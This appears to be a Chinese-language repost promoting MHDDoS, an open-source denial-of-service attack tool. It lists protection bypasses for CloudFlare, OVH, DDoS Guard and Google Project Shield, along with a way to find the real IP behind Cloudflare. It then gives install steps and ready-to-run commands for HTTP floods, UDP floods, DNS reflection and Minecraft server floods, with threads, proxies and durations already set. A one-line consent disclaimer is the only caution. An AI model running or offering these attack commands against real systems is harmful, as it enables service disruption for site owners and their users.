项目地址:https://github.com/MatrixTM/MHDDoS 作者提示:Please Don’t Attack websites without the owners consent.
—————————————————————— 重要特性(详情请查看 readme): Bypass OVH Bypass chk_captcha Send HTTP Packet With High Byte A New Method With Random SubDomain Like Google bot Google Project Shield Bypass CloudFlare Bypass DDoS Guard Bypass CloudFlare Under Attack Mode Bypass Find Real IP Address Of Websites Powered By Cloudflare —————————— 自动安装 git clone https://github.com/MHProDev/MHDDoS.git cd MHDDoS pip install -r requirements.txt ——————————- DockerFile docker pull ghcr.io/mhprodev/mhddos:latest ——————————— 手动安装 python3 -m pip install cfscrape<=2.1.1 python3 -m pip install certifi<=2021.10.8 python3 -m pip install dnspython>=2.2.0 python3 -m pip install requests==2.27.1 python3 -m pip install impacket==0.9.23 python3 -m pip install psutil>=5.9.0 python3 -m pip install icmplib>=2.1.1 python3 -m pip install git+https://github.com/MHProDev/PyRoxy.git python3 -m pip install yarl~=1.7.2 ———————————– 例如:
Layer7 (Website):
# Running bypass attack from 101 threads, # with socks 5, 100 requests per proxy (connection), for 3600 seconds python start.py bypass https://example.com 5 101 socks5.txt 100 3600 # Running bomb attack from 50 threads (be careful must be < 300) # with all proxies (0), 100 requests per proxy (connection), for 3600 seconds python start.py bomb https://example.com 0 50 proxy.txt 100 3600
Layer4 (Server/Home): # Running udp attack from 1 threads, for 3600 seconds python start.py udp 1.1.1.1:53 1 3600 # Running dns attack from 100 threads, for 3600 seconds # with reflector servers from dns.txt, for 3600 seconds python start.py dns 1.1.1.1:53 100 3600 dns.txt # Running minecraft attack from 1000 threads # with socks 5, for 3600 seconds python start.py minecraft 1.1.1.1:53 1000 3600 5 socks5.txt Debug Mode (Log Attack status): python start.py bypass https://example.com 5 1000 socks5.txt 100 100 true python start.py udp 1.1.1.1:53 1 100 true python start.py dns 1.1.1.1:53 1 100 dns.txt true python start.py minecraft 1.1.1.1:53 1 100 5 socks5.txt true
Tools/Help: python start.py tools python start.py help |